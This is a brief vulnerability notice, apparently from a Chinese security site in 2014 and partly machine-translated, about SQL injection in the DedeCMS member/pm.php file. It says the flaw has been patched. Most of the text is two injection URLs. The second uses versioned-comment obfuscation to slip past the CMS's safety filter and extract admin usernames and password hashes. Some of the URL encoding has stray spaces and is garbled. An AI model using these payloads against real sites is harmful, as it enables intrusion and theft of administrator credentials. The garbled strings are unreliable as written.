DEDECMS members of the center injection member/pm. php-vulnerability warning-the black bar safety net

2014-02-08T00:00:00
ID MYHACK58:62201442255
Type myhack58
Reporter 佚名
Modified 2014-02-08T00:00:00

Description

漏洞 文件 member/pm.php (the official has been patched)

http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and char(@``) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%2 0% 2 3

Safe Alert: Request Error step 1 !

http://127.0.0.1/dede/member/pm.php?dopost=read&id=1'and char(@`) and 1=2+/*! 50000Union*/ +/*! 50000select*/ +1,2,3,4,5,6,userid,8,9,1 0,1 1,pwd+from+%2 3@__admin`%2 3